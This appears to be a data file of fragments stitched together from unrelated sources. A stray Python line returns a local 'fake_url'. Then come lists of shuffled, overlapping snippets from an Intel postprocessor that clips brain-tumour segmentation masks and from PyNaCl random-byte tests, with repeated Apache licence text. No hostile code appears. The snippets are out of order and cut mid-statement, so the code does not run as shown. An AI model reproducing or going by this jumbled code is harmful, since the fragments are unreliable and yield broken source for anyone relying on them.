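    fake_url = 'file://{}'.format(pic_path)
    return fake_url, fake_url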
[ "Corporation Licensed under the Apache License, Version 2.0 (the \"License\");", "permissions and limitations under the License. \"\"\" import numpy as", "greater than min_value') def process_image(self, annotation, prediction): for target in", "Unless required by applicable law or agreed to in writing,", "by applicable law or agreed to in writing, software distributed", ".postprocessor import PostprocessorWithSpecificTargets from ..representation import BrainTumorSegmentationAnnotation, BrainTumorSegmentationPrediction from ..config", "ConfigError class ClipSegmentationMask(PostprocessorWithSpecificTargets): __provider__ = 'clip_segmentation_mask' annotation_types = (BrainTumorSegmentationAnnotation, )", "NumberField(value_type=int, min_value=0, optional=True, default=0, description=\"Min value\"), 'max_value': NumberField(value_type=int, description=\"Max value\")", "from ..representation import BrainTumorSegmentationAnnotation, BrainTumorSegmentationPrediction from ..config import NumberField, ConfigError", "software distributed under the License is distributed on an \"AS", "distributed under the License is distributed on an \"AS IS\"", "CONDITIONS OF ANY KIND, either express or implied. See the", "limitations under the License. \"\"\" import numpy as np from", "def parameters(cls): parameters = super().parameters() parameters.update({ 'min_value': NumberField(value_type=int, min_value=0, optional=True,", "parameters(cls): parameters = super().parameters() parameters.update({ 'min_value': NumberField(value_type=int, min_value=0, optional=True, default=0,", "annotation: target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value) for target in prediction:", "Version 2.0 (the \"License\"); you may not use this file", "if self.max_value < self.min_value: raise ConfigError('max_value should be greater than", "writing, software distributed under the License is distributed on an", "'min_value': NumberField(value_type=int, min_value=0, optional=True, default=0, description=\"Min value\"), 'max_value': NumberField(value_type=int, description=\"Max", "not use this file except in compliance with the License.", "2.0 (the \"License\"); you may not use this file except", "Apache License, Version 2.0 (the \"License\"); you may not use", "copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable", "express or implied. See the License for the specific language", "NumberField, ConfigError class ClipSegmentationMask(PostprocessorWithSpecificTargets): __provider__ = 'clip_segmentation_mask' annotation_types = (BrainTumorSegmentationAnnotation,", "in annotation: target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value) for target in", "IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "in compliance with the License. You may obtain a copy", "of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law", "you may not use this file except in compliance with", "is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR", "..config import NumberField, ConfigError class ClipSegmentationMask(PostprocessorWithSpecificTargets): __provider__ = 'clip_segmentation_mask' annotation_types", "the License. 
You may obtain a copy of the License", "agreed to in writing, software distributed under the License is", "\"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "annotation_types = (BrainTumorSegmentationAnnotation, ) prediction_types = (BrainTumorSegmentationPrediction, ) @classmethod def", "process_image(self, annotation, prediction): for target in annotation: target.mask = np.clip(target.mask,", "ClipSegmentationMask(PostprocessorWithSpecificTargets): __provider__ = 'clip_segmentation_mask' annotation_types = (BrainTumorSegmentationAnnotation, ) prediction_types =", "distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS", "at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to", "use this file except in compliance with the License. You", "self.max_value < self.min_value: raise ConfigError('max_value should be greater than min_value')", ") @classmethod def parameters(cls): parameters = super().parameters() parameters.update({ 'min_value': NumberField(value_type=int,", "be greater than min_value') def process_image(self, annotation, prediction): for target", "np from .postprocessor import PostprocessorWithSpecificTargets from ..representation import BrainTumorSegmentationAnnotation, BrainTumorSegmentationPrediction", "the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or", "'clip_segmentation_mask' annotation_types = (BrainTumorSegmentationAnnotation, ) prediction_types = (BrainTumorSegmentationPrediction, ) @classmethod", "ANY KIND, either express or implied. See the License for", "self.get_value_from_config('min_value') self.max_value = self.get_value_from_config('max_value') if self.max_value < self.min_value: raise ConfigError('max_value", "Copyright (c) 2018-2022 Intel Corporation Licensed under the Apache License,", "http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in", "\"\"\" import numpy as np from .postprocessor import PostprocessorWithSpecificTargets from", "may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless", "obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required", "self.get_value_from_config('max_value') if self.max_value < self.min_value: raise ConfigError('max_value should be greater", "}) return parameters def configure(self): self.min_value = self.get_value_from_config('min_value') self.max_value =", "numpy as np from .postprocessor import PostprocessorWithSpecificTargets from ..representation import", "should be greater than min_value') def process_image(self, annotation, prediction): for", "prediction_types = (BrainTumorSegmentationPrediction, ) @classmethod def parameters(cls): parameters = super().parameters()", "import numpy as np from .postprocessor import PostprocessorWithSpecificTargets from ..representation", "either express or implied. See the License for the specific", "super().parameters() parameters.update({ 'min_value': NumberField(value_type=int, min_value=0, optional=True, default=0, description=\"Min value\"), 'max_value':", "BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "under the License is distributed on an \"AS IS\" BASIS,", "\"License\"); you may not use this file except in compliance", "License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES", "Licensed under the Apache License, Version 2.0 (the \"License\"); you", "under the License. 
\"\"\" import numpy as np from .postprocessor", ") prediction_types = (BrainTumorSegmentationPrediction, ) @classmethod def parameters(cls): parameters =", "(BrainTumorSegmentationAnnotation, ) prediction_types = (BrainTumorSegmentationPrediction, ) @classmethod def parameters(cls): parameters", "ConfigError('max_value should be greater than min_value') def process_image(self, annotation, prediction):", "with the License. You may obtain a copy of the", "License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed", "optional=True, default=0, description=\"Min value\"), 'max_value': NumberField(value_type=int, description=\"Max value\") }) return", "default=0, description=\"Min value\"), 'max_value': NumberField(value_type=int, description=\"Max value\") }) return parameters", "License for the specific language governing permissions and limitations under", "for target in annotation: target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value) for", "value\"), 'max_value': NumberField(value_type=int, description=\"Max value\") }) return parameters def configure(self):", "= np.clip(target.mask, a_min=self.min_value, a_max=self.max_value) for target in prediction: target.mask =", "for target in prediction: target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value) return", "raise ConfigError('max_value should be greater than min_value') def process_image(self, annotation,", "this file except in compliance with the License. You may", "from ..config import NumberField, ConfigError class ClipSegmentationMask(PostprocessorWithSpecificTargets): __provider__ = 'clip_segmentation_mask'", "specific language governing permissions and limitations under the License. \"\"\"", "(the \"License\"); you may not use this file except in", "def configure(self): self.min_value = self.get_value_from_config('min_value') self.max_value = self.get_value_from_config('max_value') if self.max_value", "in prediction: target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value) return annotation, prediction", "= self.get_value_from_config('min_value') self.max_value = self.get_value_from_config('max_value') if self.max_value < self.min_value: raise", "applicable law or agreed to in writing, software distributed under", "\"\"\" Copyright (c) 2018-2022 Intel Corporation Licensed under the Apache", "target in prediction: target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value) return annotation,", "@classmethod def parameters(cls): parameters = super().parameters() parameters.update({ 'min_value': NumberField(value_type=int, min_value=0,", "= (BrainTumorSegmentationPrediction, ) @classmethod def parameters(cls): parameters = super().parameters() parameters.update({", "and limitations under the License. \"\"\" import numpy as np", "the License is distributed on an \"AS IS\" BASIS, WITHOUT", "You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0", "the specific language governing permissions and limitations under the License.", "parameters.update({ 'min_value': NumberField(value_type=int, min_value=0, optional=True, default=0, description=\"Min value\"), 'max_value': NumberField(value_type=int,", "2018-2022 Intel Corporation Licensed under the Apache License, Version 2.0", "License. 
\"\"\" import numpy as np from .postprocessor import PostprocessorWithSpecificTargets", "self.min_value: raise ConfigError('max_value should be greater than min_value') def process_image(self,", "..representation import BrainTumorSegmentationAnnotation, BrainTumorSegmentationPrediction from ..config import NumberField, ConfigError class", "as np from .postprocessor import PostprocessorWithSpecificTargets from ..representation import BrainTumorSegmentationAnnotation,", "from .postprocessor import PostprocessorWithSpecificTargets from ..representation import BrainTumorSegmentationAnnotation, BrainTumorSegmentationPrediction from", "import NumberField, ConfigError class ClipSegmentationMask(PostprocessorWithSpecificTargets): __provider__ = 'clip_segmentation_mask' annotation_types =", "the Apache License, Version 2.0 (the \"License\"); you may not", "file except in compliance with the License. You may obtain", "except in compliance with the License. You may obtain a", "or implied. See the License for the specific language governing", "KIND, either express or implied. See the License for the", "import PostprocessorWithSpecificTargets from ..representation import BrainTumorSegmentationAnnotation, BrainTumorSegmentationPrediction from ..config import", "return parameters def configure(self): self.min_value = self.get_value_from_config('min_value') self.max_value = self.get_value_from_config('max_value')", "to in writing, software distributed under the License is distributed", "than min_value') def process_image(self, annotation, prediction): for target in annotation:", "or agreed to in writing, software distributed under the License", "annotation, prediction): for target in annotation: target.mask = np.clip(target.mask, a_min=self.min_value,", "def process_image(self, annotation, prediction): for target in annotation: target.mask =", "law or agreed to in writing, software distributed under the", "OR CONDITIONS OF ANY KIND, either express or implied. See", "= self.get_value_from_config('max_value') if self.max_value < self.min_value: raise ConfigError('max_value should be", "(c) 2018-2022 Intel Corporation Licensed under the Apache License, Version", "compliance with the License. You may obtain a copy of", "target in annotation: target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value) for target", "language governing permissions and limitations under the License. \"\"\" import", "self.max_value = self.get_value_from_config('max_value') if self.max_value < self.min_value: raise ConfigError('max_value should", "NumberField(value_type=int, description=\"Max value\") }) return parameters def configure(self): self.min_value =", "OF ANY KIND, either express or implied. See the License", "(BrainTumorSegmentationPrediction, ) @classmethod def parameters(cls): parameters = super().parameters() parameters.update({ 'min_value':", "under the Apache License, Version 2.0 (the \"License\"); you may", "on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF", "the License. 
\"\"\" import numpy as np from .postprocessor import", "min_value') def process_image(self, annotation, prediction): for target in annotation: target.mask", "min_value=0, optional=True, default=0, description=\"Min value\"), 'max_value': NumberField(value_type=int, description=\"Max value\") })", "= 'clip_segmentation_mask' annotation_types = (BrainTumorSegmentationAnnotation, ) prediction_types = (BrainTumorSegmentationPrediction, )", "description=\"Max value\") }) return parameters def configure(self): self.min_value = self.get_value_from_config('min_value')", "self.min_value = self.get_value_from_config('min_value') self.max_value = self.get_value_from_config('max_value') if self.max_value < self.min_value:", "description=\"Min value\"), 'max_value': NumberField(value_type=int, description=\"Max value\") }) return parameters def", "License, Version 2.0 (the \"License\"); you may not use this", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "Intel Corporation Licensed under the Apache License, Version 2.0 (the", "for the specific language governing permissions and limitations under the", "See the License for the specific language governing permissions and", "parameters = super().parameters() parameters.update({ 'min_value': NumberField(value_type=int, min_value=0, optional=True, default=0, description=\"Min", "prediction): for target in annotation: target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value)", "a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by", "governing permissions and limitations under the License. \"\"\" import numpy", "parameters def configure(self): self.min_value = self.get_value_from_config('min_value') self.max_value = self.get_value_from_config('max_value') if", "target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value) for target in prediction: target.mask", "configure(self): self.min_value = self.get_value_from_config('min_value') self.max_value = self.get_value_from_config('max_value') if self.max_value <", "= super().parameters() parameters.update({ 'min_value': NumberField(value_type=int, min_value=0, optional=True, default=0, description=\"Min value\"),", "class ClipSegmentationMask(PostprocessorWithSpecificTargets): __provider__ = 'clip_segmentation_mask' annotation_types = (BrainTumorSegmentationAnnotation, ) prediction_types", "License. You may obtain a copy of the License at", "np.clip(target.mask, a_min=self.min_value, a_max=self.max_value) for target in prediction: target.mask = np.clip(target.mask,", "BrainTumorSegmentationAnnotation, BrainTumorSegmentationPrediction from ..config import NumberField, ConfigError class ClipSegmentationMask(PostprocessorWithSpecificTargets): __provider__", "value\") }) return parameters def configure(self): self.min_value = self.get_value_from_config('min_value') self.max_value", "the License for the specific language governing permissions and limitations", "may not use this file except in compliance with the", "in writing, software distributed under the License is distributed on", "= (BrainTumorSegmentationAnnotation, ) prediction_types = (BrainTumorSegmentationPrediction, ) @classmethod def parameters(cls):", "required by applicable law or agreed to in writing, software", "a_min=self.min_value, a_max=self.max_value) for target in prediction: target.mask = np.clip(target.mask, a_min=self.min_value,", "implied. 
See the License for the specific language governing permissions", "import BrainTumorSegmentationAnnotation, BrainTumorSegmentationPrediction from ..config import NumberField, ConfigError class ClipSegmentationMask(PostprocessorWithSpecificTargets):", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "BrainTumorSegmentationPrediction from ..config import NumberField, ConfigError class ClipSegmentationMask(PostprocessorWithSpecificTargets): __provider__ =", "an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY", "'max_value': NumberField(value_type=int, description=\"Max value\") }) return parameters def configure(self): self.min_value", "a_max=self.max_value) for target in prediction: target.mask = np.clip(target.mask, a_min=self.min_value, a_max=self.max_value)", "PostprocessorWithSpecificTargets from ..representation import BrainTumorSegmentationAnnotation, BrainTumorSegmentationPrediction from ..config import NumberField,", "<gh_stars>1000+ \"\"\" Copyright (c) 2018-2022 Intel Corporation Licensed under the", "__provider__ = 'clip_segmentation_mask' annotation_types = (BrainTumorSegmentationAnnotation, ) prediction_types = (BrainTumorSegmentationPrediction,", "< self.min_value: raise ConfigError('max_value should be greater than min_value') def" ]
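A tiny standalone demonstration (an addition, not part of the row) of the np.clip call that process_image applies to each mask: every value is forced into the closed interval [min_value, max_value]:

import numpy as np

# Values below a_min are raised to it; values above a_max are lowered to it.
mask = np.array([-2, 0, 1, 3, 7])
print(np.clip(mask, a_min=0, a_max=3))  # -> [0 0 1 3 3]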
[ "import nacl.secret import nacl.utils def test_random_bytes_produces(): assert len(nacl.utils.random(16)) == 16", "from 32 bytes\" seed = b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\" with pytest.raises(TypeError) as e:", "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\" with pytest.raises(TypeError) as e: nacl.utils.randombytes_deterministic(100, seed) assert expected in", "32 bytes\" seed = b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\" with pytest.raises(TypeError) as e: nacl.utils.randombytes_deterministic(100,", "# # Licensed under the Apache License, Version 2.0 (the", "compliance with the License. # You may obtain a copy", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "2.0 (the \"License\"); # you may not use this file", "agreed to in writing, software # distributed under the License", "file except in compliance with the License. # You may", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "Unless required by applicable law or agreed to in writing,", "str(b\"\\x00\" * 32) def test_deterministic_random_bytes(): expected = ( b\"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba\" b\"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f\"", "def test_deterministic_random_bytes(): expected = ( b\"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba\" b\"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f\" b\"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf\" b\"982a1bb4587a5c970ff0810ca3b791d7e12\" )", "def test_string_fixer(): assert str(nacl.secret.SecretBox(b\"\\x00\" * 32)) == str(b\"\\x00\" * 32)", "distributed under the License is distributed on an \"AS IS\"", "seed = ( b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\" b\"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\" b\"\\x1c\\x1d\\x1e\\x1f\" ) assert ( nacl.utils.randombytes_deterministic(", "def test_random_bytes_produces_different_bytes(): assert nacl.utils.random(16) != nacl.utils.random(16) def test_string_fixer(): assert str(nacl.secret.SecretBox(b\"\\x00\"", "# Copyright 2013 <NAME> and individual contributors # # Licensed", "random bytes must be generated from 32 bytes\" seed =", "<NAME> and individual contributors # # Licensed under the Apache", "nacl.utils.randombytes_deterministic( 100, seed, encoder=nacl.utils.encoding.HexEncoder ) == expected ) def test_deterministic_random_bytes_invalid_seed_length():", "the specific language governing permissions and # limitations under the", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "express or implied. # See the License for the specific", "applicable law or agreed to in writing, software # distributed", "!= nacl.utils.random(16) def test_string_fixer(): assert str(nacl.secret.SecretBox(b\"\\x00\" * 32)) == str(b\"\\x00\"", "except in compliance with the License. 
# You may obtain", "of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless", "b\"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f\" b\"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf\" b\"982a1bb4587a5c970ff0810ca3b791d7e12\" ) seed = ( b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\" b\"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\" b\"\\x1c\\x1d\\x1e\\x1f\"", "Licensed under the Apache License, Version 2.0 (the \"License\"); #", ") == expected ) def test_deterministic_random_bytes_invalid_seed_length(): expected = \"Deterministic random", "not use this file except in compliance with the License.", "permissions and # limitations under the License. import pytest import", "* 32) def test_deterministic_random_bytes(): expected = ( b\"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba\" b\"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f\" b\"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf\"", "writing, software # distributed under the License is distributed on", "in writing, software # distributed under the License is distributed", "32) def test_deterministic_random_bytes(): expected = ( b\"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba\" b\"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f\" b\"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf\" b\"982a1bb4587a5c970ff0810ca3b791d7e12\"", "you may not use this file except in compliance with", "b\"982a1bb4587a5c970ff0810ca3b791d7e12\" ) seed = ( b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\" b\"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\" b\"\\x1c\\x1d\\x1e\\x1f\" ) assert", "# Licensed under the Apache License, Version 2.0 (the \"License\");", "language governing permissions and # limitations under the License. import", "expected = \"Deterministic random bytes must be generated from 32", "( nacl.utils.randombytes_deterministic( 100, seed, encoder=nacl.utils.encoding.HexEncoder ) == expected ) def", "assert nacl.utils.random(16) != nacl.utils.random(16) def test_string_fixer(): assert str(nacl.secret.SecretBox(b\"\\x00\" * 32))", "100, seed, encoder=nacl.utils.encoding.HexEncoder ) == expected ) def test_deterministic_random_bytes_invalid_seed_length(): expected", "* 32)) == str(b\"\\x00\" * 32) def test_deterministic_random_bytes(): expected =", "assert ( nacl.utils.randombytes_deterministic( 100, seed, encoder=nacl.utils.encoding.HexEncoder ) == expected )", "use this file except in compliance with the License. #", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "import nacl.utils def test_random_bytes_produces(): assert len(nacl.utils.random(16)) == 16 def test_random_bytes_produces_different_bytes():", "CONDITIONS OF ANY KIND, either express or implied. # See", "the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "# limitations under the License. import pytest import nacl.secret import", "or implied. # See the License for the specific language", "License is distributed on an \"AS IS\" BASIS, # WITHOUT", "License. # You may obtain a copy of the License", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "License, Version 2.0 (the \"License\"); # you may not use", "governing permissions and # limitations under the License. 
import pytest", "( b\"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba\" b\"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f\" b\"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf\" b\"982a1bb4587a5c970ff0810ca3b791d7e12\" ) seed = ( b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\"", "# You may obtain a copy of the License at", "limitations under the License. import pytest import nacl.secret import nacl.utils", "KIND, either express or implied. # See the License for", "specific language governing permissions and # limitations under the License.", "the License. import pytest import nacl.secret import nacl.utils def test_random_bytes_produces():", "def test_deterministic_random_bytes_invalid_seed_length(): expected = \"Deterministic random bytes must be generated", "def test_random_bytes_produces(): assert len(nacl.utils.random(16)) == 16 def test_random_bytes_produces_different_bytes(): assert nacl.utils.random(16)", "( b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\" b\"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\" b\"\\x1c\\x1d\\x1e\\x1f\" ) assert ( nacl.utils.randombytes_deterministic( 100, seed,", "under the License is distributed on an \"AS IS\" BASIS,", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "License for the specific language governing permissions and # limitations", "individual contributors # # Licensed under the Apache License, Version", "expected = ( b\"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba\" b\"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f\" b\"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf\" b\"982a1bb4587a5c970ff0810ca3b791d7e12\" ) seed =", "License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by", "== 16 def test_random_bytes_produces_different_bytes(): assert nacl.utils.random(16) != nacl.utils.random(16) def test_string_fixer():", "test_random_bytes_produces(): assert len(nacl.utils.random(16)) == 16 def test_random_bytes_produces_different_bytes(): assert nacl.utils.random(16) !=", "b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\" b\"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\" b\"\\x1c\\x1d\\x1e\\x1f\" ) assert ( nacl.utils.randombytes_deterministic( 100, seed, encoder=nacl.utils.encoding.HexEncoder", "pytest import nacl.secret import nacl.utils def test_random_bytes_produces(): assert len(nacl.utils.random(16)) ==", ") def test_deterministic_random_bytes_invalid_seed_length(): expected = \"Deterministic random bytes must be", "assert len(nacl.utils.random(16)) == 16 def test_random_bytes_produces_different_bytes(): assert nacl.utils.random(16) != nacl.utils.random(16)", "test_deterministic_random_bytes_invalid_seed_length(): expected = \"Deterministic random bytes must be generated from", "License. 
import pytest import nacl.secret import nacl.utils def test_random_bytes_produces(): assert", "nacl.utils.random(16) def test_string_fixer(): assert str(nacl.secret.SecretBox(b\"\\x00\" * 32)) == str(b\"\\x00\" *", "the License for the specific language governing permissions and #", "must be generated from 32 bytes\" seed = b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\" with", "(the \"License\"); # you may not use this file except", "= \"Deterministic random bytes must be generated from 32 bytes\"", "Apache License, Version 2.0 (the \"License\"); # you may not", "# you may not use this file except in compliance", "either express or implied. # See the License for the", "under the License. import pytest import nacl.secret import nacl.utils def", "OR CONDITIONS OF ANY KIND, either express or implied. #", "contributors # # Licensed under the Apache License, Version 2.0", "# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "the License is distributed on an \"AS IS\" BASIS, #", ") assert ( nacl.utils.randombytes_deterministic( 100, seed, encoder=nacl.utils.encoding.HexEncoder ) == expected", "in compliance with the License. # You may obtain a", "str(nacl.secret.SecretBox(b\"\\x00\" * 32)) == str(b\"\\x00\" * 32) def test_deterministic_random_bytes(): expected", "seed, encoder=nacl.utils.encoding.HexEncoder ) == expected ) def test_deterministic_random_bytes_invalid_seed_length(): expected =", "software # distributed under the License is distributed on an", "bytes\" seed = b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\" with pytest.raises(TypeError) as e: nacl.utils.randombytes_deterministic(100, seed)", "32)) == str(b\"\\x00\" * 32) def test_deterministic_random_bytes(): expected = (", "# # Unless required by applicable law or agreed to", "= ( b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\" b\"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\" b\"\\x1c\\x1d\\x1e\\x1f\" ) assert ( nacl.utils.randombytes_deterministic( 100,", "nacl.secret import nacl.utils def test_random_bytes_produces(): assert len(nacl.utils.random(16)) == 16 def", "a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #", "bytes must be generated from 32 bytes\" seed = b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\"", "obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "expected ) def test_deterministic_random_bytes_invalid_seed_length(): expected = \"Deterministic random bytes must", "b\"\\x1c\\x1d\\x1e\\x1f\" ) assert ( nacl.utils.randombytes_deterministic( 100, seed, encoder=nacl.utils.encoding.HexEncoder ) ==", "Version 2.0 (the \"License\"); # you may not use this", "law or agreed to in writing, software # distributed under", "test_string_fixer(): assert str(nacl.secret.SecretBox(b\"\\x00\" * 32)) == str(b\"\\x00\" * 32) def", "b\"0d8e6cc68715648926732e7ea73250cfaf2d58422083904c841a8ba\" b\"33b986111f346ba50723a68ae283524a6bded09f83be6b80595856f\" b\"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf\" b\"982a1bb4587a5c970ff0810ca3b791d7e12\" ) seed = ( b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\" b\"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\"", "2013 <NAME> and individual contributors # # Licensed under the", "== expected ) def test_deterministic_random_bytes_invalid_seed_length(): expected = \"Deterministic random bytes", "len(nacl.utils.random(16)) == 16 def 
test_random_bytes_produces_different_bytes(): assert nacl.utils.random(16) != nacl.utils.random(16) def", "implied. # See the License for the specific language governing", "b\"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\" b\"\\x1c\\x1d\\x1e\\x1f\" ) assert ( nacl.utils.randombytes_deterministic( 100, seed, encoder=nacl.utils.encoding.HexEncoder )", "\"Deterministic random bytes must be generated from 32 bytes\" seed", "under the Apache License, Version 2.0 (the \"License\"); # you", "b\"72e25b86918e8b114bafb94bc8abedd73daab454576b7c5833eb0bf\" b\"982a1bb4587a5c970ff0810ca3b791d7e12\" ) seed = ( b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\" b\"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\" b\"\\x1c\\x1d\\x1e\\x1f\" )", "\"License\"); # you may not use this file except in", "= b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\" with pytest.raises(TypeError) as e: nacl.utils.randombytes_deterministic(100, seed) assert expected", "distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "encoder=nacl.utils.encoding.HexEncoder ) == expected ) def test_deterministic_random_bytes_invalid_seed_length(): expected = \"Deterministic", "test_random_bytes_produces_different_bytes(): assert nacl.utils.random(16) != nacl.utils.random(16) def test_string_fixer(): assert str(nacl.secret.SecretBox(b\"\\x00\" *", "be generated from 32 bytes\" seed = b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\" with pytest.raises(TypeError)", ") seed = ( b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\" b\"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\" b\"\\x1c\\x1d\\x1e\\x1f\" ) assert (", "generated from 32 bytes\" seed = b\"\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\" with pytest.raises(TypeError) as", "by applicable law or agreed to in writing, software #", "# distributed under the License is distributed on an \"AS", "OF ANY KIND, either express or implied. # See the", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "may obtain a copy of the License at # #", "# Unless required by applicable law or agreed to in", "ANY KIND, either express or implied. # See the License", "See the License for the specific language governing permissions and", "16 def test_random_bytes_produces_different_bytes(): assert nacl.utils.random(16) != nacl.utils.random(16) def test_string_fixer(): assert", "the License. 
